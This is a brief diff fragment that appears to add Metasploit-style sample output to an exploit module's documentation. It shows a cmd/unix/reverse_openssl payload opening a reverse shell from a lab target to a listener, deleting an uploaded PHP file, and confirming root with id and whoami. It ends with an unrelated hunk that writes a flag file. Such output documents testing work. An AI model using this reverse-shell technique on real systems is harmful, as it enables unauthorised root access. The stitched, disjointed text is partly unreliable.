+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo XqZbye7zG7tGBVWc;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "XqZbye7zG7tGBVWc\n"
+[*] Matching...
+[*] A is input...
+[+] Deleted /usr/local/www/jIuhcpoe.php
+[*] Command shell session 2 opened (172.23.47.143:4545 -> 172.23.40.111:33941) at 2022-10-12 19:22:13 -0500
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+```
+
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1,2 @@`
				`$someText = "Hello!" ; $someText > "C:\flag.txt"`